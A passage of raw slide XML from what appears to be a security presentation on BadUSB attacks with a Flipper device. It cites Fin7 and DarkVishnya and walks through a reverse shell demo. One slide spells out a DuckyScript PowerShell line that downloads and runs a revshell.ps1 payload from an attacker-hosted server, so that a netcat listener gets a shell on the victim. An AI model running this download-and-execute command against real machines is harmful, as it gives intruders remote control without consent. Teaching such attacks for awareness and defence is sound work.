              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="95" name="Google Shape;95;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96" name="Google Shape;96;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15133" l="32190" r="30733" t="6250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7017138" y="1340651"/>
            <a:ext cx="822749" cy="1717325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16324" l="20384" r="26503" t="25888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099413" y="3057987"/>
            <a:ext cx="2658199" cy="1510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badUSB - Cyber Attacks</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Rare in practice, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>used in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>conjunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> with Social Engineering</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Fin7</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>DarkVishnya</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Reverse Shells</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FA0000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>not-a-virus.RemoteAdmin.Win32.DameWare</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FA0000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>MEM:Trojan.Win32.Metasploit</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>And More</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Google Shape;104;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478850" y="1017725"/>
            <a:ext cx="5939700" cy="21024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20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036763" y="1017725"/>
            <a:ext cx="1968600" cy="1968600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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badUSB - Reverse Shell Demo</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5100" r="-5100" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368063" y="1017725"/>
            <a:ext cx="2952900" cy="1968600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Google Shape;113;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078863" y="1718837"/>
            <a:ext cx="2952900" cy="1542675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3569763" y="1801925"/>
            <a:ext cx="1467000" cy="4002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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3710475" y="1801925"/>
            <a:ext cx="132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Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p20"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="113" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="6503563" y="1770587"/>
            <a:ext cx="680100" cy="576600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 94690" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3209600"/>
            <a:ext cx="8520600" cy="1438200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="85000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-314960" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper downloads and executes a reverse shell payload on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Machine</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314960" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>netcat listener accepts the connection</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-314960" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="ADADAD"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>machine now has a shell on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Windows machine</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216463" y="1017725"/>
            <a:ext cx="10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A0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5599113" y="1017725"/>
            <a:ext cx="8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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Google Shape;120;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352875" y="1460225"/>
            <a:ext cx="7855500" cy="6759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badUSB - Reverse Shell Demo</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27" name="Google Shape;127;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1411425"/>
            <a:ext cx="8520600" cy="15750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300">
                <a:solidFill>
                  <a:srgbClr val="F1E502"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> r</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="F1E502"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>STRING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.78/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>revshell.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>');"</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Opens a run box in Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>revshell.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> payload from server hosted by the attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
